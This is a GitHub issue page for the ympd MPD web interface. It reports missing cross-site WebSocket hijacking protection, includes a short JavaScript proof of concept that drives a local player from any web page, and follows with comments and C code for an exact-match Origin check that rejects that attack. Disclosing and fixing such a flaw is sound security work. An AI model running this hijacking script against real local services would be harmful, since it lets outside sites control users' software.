notandy / ympd

Standalone MPD Web GUI written in C, utilizing Websockets and Bootstrap/JS
http://www.ympd.org
GNU General Public License v2.0

Missing CSRF protection #153

Open atx opened 7 years ago

atx commented 7 years ago

The websocket endpoint is missing CSRF (CSWSH) protection, allowing a malicious website to control the client.

```javascript
// Runs on any page the victim visits: the handshake carries no token and the
// server never checks Origin, so the cross-site connection succeeds.
var ws = new WebSocket("ws://127.0.0.1:8080/ws");
ws.onopen = function (event) {
    console.log("OPENED");
    // Once open, send an MPD_API_* command every second (here: toggle pause).
    setInterval(function () {
        ws.send("MPD_API_SET_PAUSE");
    }, 1000);
}
ws.onmessage = function (event) {
    console.log("Message " + event.data);
}
```

BenjaminHae commented 7 years ago

Easiest solution is probably to implement the Content Security Policy connect-src directive, so that WebSocket connections are only allowed from the same origin.

ondras commented 5 years ago

> Easiest solution is probably to implement the Content Security Policy connect-src directive, so that WebSocket connections are only allowed from the same origin.

I don't think this would fix anything at all. The whole CSP is aimed at protecting an HTML page (so that a malicious injected script/resource cannot do much harm), but the reported vulnerability considers an attacker connecting to the (unprotected) websocket endpoint. The endpoint itself has no notion of CSP/protection.
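The check ondras is pointing at has to live in the server's handshake handler, not in a policy header on the GUI page: the browser sends an Origin header on every WebSocket handshake, including the one made by the script in the report, so the server can refuse the upgrade when that origin is not the one the GUI is served from. The following is an added example written for this page, not ympd's own code. It assumes the handshake handler can see the raw request text and an allowlist of origins (both constructed here); how it is wired into ympd's embedded HTTP library is not shown. Matching is exact, which is the point a practitioner most often gets wrong: a prefix or substring comparison would accept an origin like http://127.0.0.1:8080.evil.example.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Exact-match allowlist of origins the GUI is served from (assumed for this
 * example; ympd itself does not ship such a list). */
static const char *const ALLOWED_ORIGINS[] = {
    "http://127.0.0.1:8080",
    "http://localhost:8080",
};
#define N_ALLOWED (sizeof ALLOWED_ORIGINS / sizeof ALLOWED_ORIGINS[0])

/* Copy the value of header `name` from a raw HTTP/1.1 request into `out`.
 * Header names are case-insensitive; surrounding whitespace is trimmed.
 * Returns 1 if found, 0 if absent, -1 if the value does not fit in `out`. */
static int header_value(const char *req, const char *name, char *out, size_t outlen)
{
    size_t nlen = strlen(name);
    const char *p = strstr(req, "\r\n");            /* skip the request line */
    if (p == NULL) return 0;
    p += 2;
    while (*p != '\0' && !(p[0] == '\r' && p[1] == '\n')) {  /* blank line ends headers */
        const char *eol = strstr(p, "\r\n");
        size_t linelen = eol ? (size_t)(eol - p) : strlen(p);
        if (linelen > nlen && strncasecmp(p, name, nlen) == 0 && p[nlen] == ':') {
            const char *v = p + nlen + 1, *vend = p + linelen;
            while (v < vend && (*v == ' ' || *v == '\t')) v++;
            while (vend > v && (vend[-1] == ' ' || vend[-1] == '\t')) vend--;
            if ((size_t)(vend - v) >= outlen) return -1;
            memcpy(out, v, (size_t)(vend - v));
            out[vend - v] = '\0';
            return 1;
        }
        if (eol == NULL) break;
        p = eol + 2;
    }
    return 0;
}

/* Decide whether a WebSocket handshake may be upgraded. Browsers always send
 * Origin on a WebSocket handshake, so the cross-site page from the report is
 * caught here. A request with no Origin at all comes from a non-browser
 * client (curl, a CLI tool) that cannot be a CSWSH victim; accepting it is a
 * policy choice made for this example. Comparison is exact, so the literal
 * "null" origin and any prefix/suffix-confused origin are rejected. */
int ws_handshake_allowed(const char *req, const char *const *allowed, size_t n_allowed)
{
    char origin[256];
    int rc = header_value(req, "Origin", origin, sizeof origin);
    if (rc < 0) return 0;          /* oversized Origin: refuse rather than guess */
    if (rc == 0) return 1;         /* no Origin: non-browser client */
    for (size_t i = 0; i < n_allowed; i++)
        if (strcasecmp(origin, allowed[i]) == 0)
            return 1;
    return 0;
}

/* Constructed handshake requests (not captured from ympd). */
#define HANDSHAKE(origin_line) \
    "GET /ws HTTP/1.1\r\n" \
    "Host: 127.0.0.1:8080\r\n" \
    "Upgrade: websocket\r\n" \
    "Connection: Upgrade\r\n" \
    origin_line \
    "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n" \
    "Sec-WebSocket-Version: 13\r\n" \
    "\r\n"
static const char REQ_SAME_ORIGIN[] = HANDSHAKE("Origin: http://127.0.0.1:8080\r\n");
static const char REQ_ATTACKER[]    = HANDSHAKE("Origin: http://evil.example\r\n");
static const char REQ_PREFIX[]      = HANDSHAKE("Origin: http://127.0.0.1:8080.evil.example\r\n");
static const char REQ_NO_ORIGIN[]   = HANDSHAKE("");

int main(void)
{
    const char *names[] = {"same origin", "attacker page", "prefix-confused origin", "no Origin header"};
    const char *reqs[]  = {REQ_SAME_ORIGIN, REQ_ATTACKER, REQ_PREFIX, REQ_NO_ORIGIN};
    for (size_t i = 0; i < 4; i++)
        printf("%-24s -> %s\n", names[i],
               ws_handshake_allowed(reqs[i], ALLOWED_ORIGINS, N_ALLOWED) ? "upgrade" : "403");
    return 0;
}
```

Rejecting the handshake is enough on its own: a page on another origin never gets an open socket, so it cannot send MPD_API_* commands, whatever CSP the GUI page does or does not carry. An Origin check is not a substitute for authentication (any local process or LAN host can still connect), but it closes the browser-mediated attack the report describes.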